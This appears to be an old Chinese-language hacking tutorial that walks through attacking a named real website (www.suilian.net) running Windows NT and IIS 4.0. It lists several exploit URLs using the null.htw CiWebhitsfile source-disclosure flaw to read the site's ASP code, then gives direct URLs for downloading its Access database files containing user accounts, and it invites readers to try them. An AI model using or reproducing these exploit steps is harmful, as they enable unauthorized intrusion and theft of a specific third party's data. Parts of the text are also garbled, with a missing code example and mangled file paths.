一般的web　server都要使用數(shù)據(jù)庫(kù)來存儲(chǔ)信息，幾乎所有的網(wǎng)站都要用數(shù)據(jù)庫(kù)。這樣就存在著兩種可能，一種是使用小型數(shù)據(jù)庫(kù)，如aceess,一般就儲(chǔ)存在本地。另一種是使用大型數(shù)據(jù)庫(kù)，如SQL　server,Oracle這時(shí)候一般就放在另一臺(tái)機(jī)器上，然后通過ODBC來訪問它。　

由于頁(yè)面經(jīng)常需要查詢各種信息，修改用戶信息等操作，實(shí)質(zhì)上就是和數(shù)據(jù)庫(kù)打交道了。這樣就給非法用戶留下利用的機(jī)會(huì)了。

對(duì)本地?cái)?shù)據(jù)庫(kù)的攻擊。

對(duì)本地?cái)?shù)據(jù)庫(kù)的攻擊一種方法就是下載數(shù)據(jù)庫(kù)，然后呢，你就可以打開這個(gè)數(shù)據(jù)庫(kù)得到內(nèi)部的用戶和帳號(hào)了，以及其它有用的信息。

下面以“水蓮會(huì)”為例：

經(jīng)過掃描，得知www.suilian.net使用的是虛擬主機(jī)，使用的是WIndows　NT+IIS4.0.掃描器你可以使用twwwscan或者其它，其實(shí)功能都大同小異。

在對(duì)IIS攻擊時(shí)如果能夠看到ASP源代碼，那么成功的可能性就很大了。

經(jīng)過測(cè)試，發(fā)現(xiàn)此站點(diǎn)存在源代碼暴露漏洞。。。

大家可以試試：

http://www.suilian.net/null.htw?CiWebhitsfile=/maillist.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/index.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/DetNew.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/detail.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/topic4.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlefrm.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlenew.asp%20&CiRestriction=none&CiHiliteType=full

看見了什么？

當(dāng)然源代碼泄露的漏洞有很多種，這里就不一一列舉，你可以去查漏洞手冊(cè)。

現(xiàn)在你就可以去查看ASP源代碼了。

如果你對(duì)ASP不熟悉，我簡(jiǎn)單介紹一下（其實(shí)佳佳也不熟悉）。

ASP是嵌在之間。一般使用VBScript或者JavaScript書寫代碼。

看這個(gè)例子使用VBScript書寫的：

這是一個(gè)典型的與數(shù)據(jù)庫(kù)連接的代碼。

依次的步驟為：

建立連接對(duì)象，

設(shè)置數(shù)據(jù)庫(kù)路徑，

打開數(shù)據(jù)庫(kù)，

設(shè)置記錄對(duì)象，

取記錄。

這里我們就可以知道數(shù)據(jù)庫(kù)的類型，名稱和路徑，這里是在當(dāng)前目錄下。

還可以知道數(shù)據(jù)庫(kù)的表名和字段名稱。

有經(jīng)驗(yàn)的程序員一般不會(huì)把數(shù)據(jù)庫(kù)名直接放在代碼里，而是在ODBC里設(shè)置數(shù)據(jù)源，以增加安全性。

然后就發(fā)現(xiàn)存在

d:Ssuilianchatnews.mdb

d:Ssuiliantopic22.mdb等數(shù)據(jù)庫(kù)

你只要使用

http://www.suilian.net/chat/news.mdb

http://www.suilian.net/topic22.mdb

就可以把它下載下來。。。